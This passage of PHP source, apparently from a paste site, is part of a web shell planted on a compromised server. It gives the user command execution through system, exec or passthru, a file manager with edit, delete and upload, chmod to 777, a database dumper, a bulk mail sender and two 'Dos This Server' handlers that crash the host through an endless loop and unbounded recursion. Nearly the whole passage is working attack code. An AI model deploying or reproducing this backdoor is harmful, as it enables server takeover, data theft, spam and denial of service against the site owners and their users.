  1027. <p align="center">If You Click This Link This Server Crashed.<br>This Worked In Php 5.3.x : <a href="?dosthisserver=1" target="_blank"><font size=4>Dos This Server I Am Sure </font></a><br>This Worked In Php 4.x.x And 5.2.9 : <a href="?dosthisserver=2" target="_blank"><font size=4>Dos This Server I Am Sure </a>'.$end;exit;}
  1028. if ($_GET['dosthisserver']=="1"){
  1029. function dosserver(){
  1030. $junk=str_repeat("99999999999999999999999999999999999999999999999999",99999);
  1031. for($i=0;$i<2;){
  1032. $buff=bcpow($junk, '3', 2);
  1033. $buff=null;
  1034. }
  1035. }
  1036. dosserver();
  1037. }
  1038. if ($_GET['dosthisserver']=="2"){
  1039. function cx(){cx();}
  1040. cx();
  1041. }
  1042. if ($_GET['do']=="convert"){
  1043. $hash=null;
  1044. if ($_GET['stringtoh'] && $_GET['hashtoh']=='md5'){
  1045. $hash=md5($_GET['stringtoh']);
  1046. }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='sh1'){
  1047. $hash=sha1($_GET['stringtoh']);
  1048. }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='crc32'){
  1049. $hash=crc32($_GET['stringtoh']);
  1050. }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64e'){
  1051. $hash=base64_encode($_GET['stringtoh']);
  1052. }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64d'){
  1053. $hash=base64_decode($_GET['stringtoh']);
  1054. }
  1055. echo $head.'
  1056. <form method=get action="'.$me.'">
  1057. <p align="center">Convert<br><input type=hidden name=do value=convert>
  1058. <input name=stringtoh size=58><select name=hashtoh>
  1059. <option value="md5">MD5</option>
  1060. <option value="crc32">CRC32</option>
  1061. <option value="sha1">SHA1</option>
  1062. <option value="b64e">Base64 Encode!</option>
  1063. <option value="b64d">Base64 Decode!</option>
  1064. <br><textarea cols=60 rows=18>'.$hash.'</textarea><br><input type=submit value="Convert">
  1065.  
  1066. </p></form>'.$end;exit;}
  1067. if ($_GET['do']=="dump"){
  1068. echo $head.'<p align="center">';
  1069. echo '<table border=1 width=400 style="border-collapse: collapse" bordercolor=#C6C6C6 cellpadding=2><tr><td width=400 colspan=2 bgcolor=#F2F2F2><p align=center><b><font face=Arial size=2 color=#433934>Backup Database</font></b></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>DB Type:</font></td><td width=250 bgcolor=#EAEAEA><form method=post action="'.$me.'"><select name=method><option value="gzip">Gzip</option><option value="sql">Sql</option> </select></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Server:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=server size=35></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Username:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=username size=35></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Password:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=password></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Data Base Name:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=dbname></td></tr><tr><td width=400 colspan=2 bgcolor=#EAEAEA><center><input type=submit value=" Dump! " ></td></tr></table></form></center></table>'.$end;exit;}
  1070. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
  1071. $date = date("Y-m-d");
  1072. $dbserver = $_POST['server'];
  1073. $dbuser = $_POST['username'];
  1074. $dbpass = $_POST['password'];
  1075. $dbname = $_POST['dbname'];
  1076. $file = "Dump-$dbname-$date";
  1077. $method = $_POST['method'];
  1078. if ($method=='sql'){
  1079. $file="Dump-$dbname-$date.sql";
  1080. $fp=fopen($file,"w");
  1081. }else{
  1082. $file="Dump-$dbname-$date.sql.gz";
  1083. $fp = gzopen($file,"w");
  1084. }
  1085. function write($data) {
  1086. global $fp;
  1087. if ($_POST['method']=='sql'){
  1088. fwrite($fp,$data);
  1089. }else{
  1090. gzwrite($fp, $data);
  1091. }}
  1092. mysql_connect ($dbserver, $dbuser, $dbpass);
  1093. mysql_select_db($dbname);
  1094. $tables = mysql_query ("SHOW TABLES");
  1095. while ($i = mysql_fetch_array($tables)) {
  1096. $i = $i['Tables_in_'.$dbname];
  1097. $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  1098. write($create['Create Table'].";\n\n");
  1099. $sql = mysql_query ("SELECT * FROM ".$i);
  1100. if (mysql_num_rows($sql)) {
  1101. while ($row = mysql_fetch_row($sql)) {
  1102. foreach ($row as $j => $k) {
  1103. $row[$j] = "'".mysql_escape_string($k)."'";
  1104. }
  1105. write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
  1106. }
  1107. }
  1108. }
  1109. if ($method=='sql'){
  1110. fclose ($fp);
  1111. }else{
  1112. gzclose($fp);}
  1113. header("Content-Disposition: attachment; filename=" . $file);
  1114. header("Content-Type: application/download");
  1115. header("Content-Length: " . filesize($file));
  1116. flush();
  1117.  
  1118. $fp = fopen($file, "r");
  1119. while (!feof($fp))
  1120. {
  1121. echo fread($fp, 65536);
  1122. flush();
  1123. }
  1124. fclose($fp);
  1125. }
  1126.  
  1127. if ($_GET['do']=="mail"){
  1128. echo $head.'
  1129. <form method=post action="'.$me.'">
  1130. <p align="center">
  1131. Address : <input type="text" name="admail" size="50"><br><br>Subject : <input type="text" name="submail" size="50"><br><br><textarea cols=70 rows=18 name=textmail>Text</textarea><br><br>Number For Send : <input type="text" name="numail" size="5" value=1><input type=submit value=Send!></form>'.$end;exit;}
  1132. if ($_POST['admail'] && $_POST['submail'] ){
  1133. for($mi=0;$mi<intval($_POST['numail']);$mi++){
  1134. mail($_POST['admail'], $_POST['submail'], $_POST['textmail']);}
  1135. }
  1136. if($_GET['do']=="db"){
  1137. echo $head;sqlclienT();echo $end;
  1138. exit;
  1139. }
  1140. if($_REQUEST['file2ch'] && $_REQUEST['chmodnow']){
  1141. $chmodnum2=$_REQUEST['chmodnow'];
  1142. chmod($_REQUEST['file2ch'],"0".$chmodnum2);
  1143. }
  1144. if($_GET['do']=="chmod"){
  1145. echo $head.$formg.$nowaddress."<p align=center><b>Chmod</b><br><input size=50 name=file2ch value='".$_REQUEST['address'].$_REQUEST['filename']."'> To <input name=chmodnow size=1 value=777><br><input type=submit value=Set></form>".$end;exit;
  1146.  
  1147. }
  1148. /* if($_GET['do']=="edit"){
  1149. if($_GET['filename']=="dir"){
  1150. if(is_readable($_GET['address'])){
  1151. chdir($_GET['address']);}else{alert("Permission Denied !");}
  1152.  
  1153. }} */
  1154. $araddresss=explode($slash,getcwd());
  1155. $matharrayy=count($araddresss)-1;
  1156. $addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss);
  1157. for($countback=0;$countback<count($addr1backk);$countback++){
  1158. $arraybacke[$countback]=$slash.$addr1backk[$countback];
  1159. $backdirunixx=$backdirunixx.$slash.$addr1backk[$countback];
  1160. }
  1161. if ($slash=="\\"){
  1162. $countback=null;
  1163. $backdirwin=null;
  1164. for($countback=1;$countback<count($addr1backk);$countback++){
  1165. $backdirwin=$backdirwin."\\".$addr1backk[$countback];}
  1166. $backdirwin=$addr1backk[0].$backdirwin;
  1167. $backaddresss=$backdirwin;
  1168. }else{
  1169. $countback=null;
  1170. $backdirwin=null;
  1171. for($countback=1;$countback<count($addr1backk);$countback++){
  1172. $backdirwin=$backdirwin."/".$addr1backk[$countback];}
  1173. $backdirwin=$addr1backk[0].$backdirwin;
  1174. $backaddresss=$backdirwin;
  1175. $backaddresss=str_replace("\\","/",$backaddresss);
  1176. }
  1177. function calc_dir_size($path)
  1178. {
  1179. $size = 0;
  1180. if ($handle = opendir($path))
  1181. {
  1182. while (false !== ($entry = readdir($handle)))
  1183. {
  1184. $current_path = $path . '/' . $entry;
  1185. if ($entry != '.' && $entry != '..' && !is_link($current_path))
  1186. {
  1187. if (is_file($current_path))
  1188. $size += filesize($current_path);
  1189. elseif (is_dir($current_path))
  1190. $size = calc_dir_size($current_path);
  1191. }
  1192. }
  1193. }
  1194. closedir($handle);
  1195. return $size;
  1196. }
  1197. function openf($parsef){
  1198. global $basep,$slash;
  1199.  
  1200. if(strlen(strpos(getcwd(),$basep))>=1){
  1201. $rr=str_replace($basep,"",getcwd());
  1202. $rr=str_replace("\\","/",$rr);
  1203. $diropen='<a href="'.$rr."/".$parsef.'">'.$parsef.'</a>';
  1204. }else{
  1205. $diropen='<a href="?do=edit&address='.getcwd().$slash.'&filename='.$parsef.'">'.$parsef.'</a>';
  1206. }
  1207. return $diropen;
  1208. }
  1209. if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']){$ifget=$_POST['address'];}
  1210. if($cwd==''){$cwd=getcwd();}$nowaddress='<input type=hidden name=address value="'.$cwd.'">';
  1211. $ad=getcwd();
  1212. $hand=opendir("$ad");
  1213. $coi=0;
  1214. $coi2=0;
  1215.  
  1216. while (false !== ($fileee = readdir($hand))) {
  1217.  
  1218.  
  1219. if ($fileee != "." && $fileee != "..") {
  1220. if (filetype($fileee)=="dir"){
  1221. if ($coi %2){
  1222. $colort='"#e7e3de"';
  1223. }else{
  1224. $colort='"#e4e1de"';
  1225.  
  1226. }
  1227. $coi++;
  1228. $fil=$fil.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 0px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="1" dir="ltr">
  1229. <tr onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$oo.'\';"><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><img src="data:image/png;base64,' .$picdir. '" /> <a href="?address='.$cwd.$slash.$fileee.$slash.'">'.$fileee.'</b></span></td>
  1230. <td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"><a href="?do=down&type=dir&address='.$cwd.$slash.'&dirname='.$fileee.'">DL</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
  1231. <td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=dir&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
  1232. ;}
  1233. else{
  1234.  
  1235. if ($coi2 %2){
  1236. $colort='"#e7e3de"';
  1237. }else{
  1238. $colort='"#e4e1de"';
  1239. }
  1240.  
  1241. $coi2++;
  1242. $file=$file.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 0px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
  1243. <tr onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$oo.'\';"><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><img src="data:image/png;base64,' .$picfile. '" /> '.openf($fileee).'</span></td>
  1244. <td valign="top" height="19" width="80"><font face="Tahoma" style="font-size: 9pt">'.sizee(filesize($fileee)).'</td><td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=edit&address='.$cwd.$slash.'&filename='.$fileee.'">Edit</a></td><td valign="top" height="19" width="23"><font face="Tahoma" style="font-size: 9pt"><a href="?do=down&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">DL</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
  1245. <td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
  1246. ;}
  1247. }
  1248. }
  1249. echo $head.'
  1250. <font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
  1251. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
  1252. </tr></table>'.$fil.$file.'</table>
  1253. <table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5">
  1254. <tr>
  1255. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  1256. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Command Execute : </font></td>
  1257. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input type=hidden name=address value='.getcwd().'><input name=command value=id size=50><input type=hidden name=do value=cmd size=50> <select name=execmethod>
  1258. <option value="system">System</option> <option value="exec">Exec</option> <option value="passthru">Passthru</option>
  1259. </select> <input type=submit value="Execute"></form></td></tr>
  1260. <tr>
  1261. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  1262. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Dir : </font></td>
  1263. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().$slash.' size=50>
  1264. <input type=submit value=Change></form></td></tr>
  1265. <tr>
  1266. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  1267. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Create Dir : </font></td>
  1268. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=cdirname value='.getcwd().$slash.' size=50><input type=hidden name=address value='.getcwd().'><input type=submit value=" Create "></form></td></tr>
  1269. <tr>
  1270. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  1271. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Create File : </font></td>
  1272. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=cfilename value='.getcwd().$slash.' size=50> <input type=hidden name=address value='.getcwd().'><input type=submit value=" Create "></form></td></tr>
  1273. <tr></form>
  1274. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  1275. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Upload : </font></td>
  1276. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
  1277. <font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee > <input type=hidden name=address value='.getcwd().'>
  1278. <input type=submit value=Upload /></form></td></tr>
  1279. <tr>
  1280. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  1281. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Copy File : </font></td>
  1282. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input size=20 name=copyname><input type=hidden name=address value="'.getcwd().'"> To <input size=40 name=cpyto value="'.getcwd().$slash.'"> <input type=submit value =Copy></form></td></tr>
  1283. '.$end;
  1284. ?>
Add Comment
Please, Sign In to add comment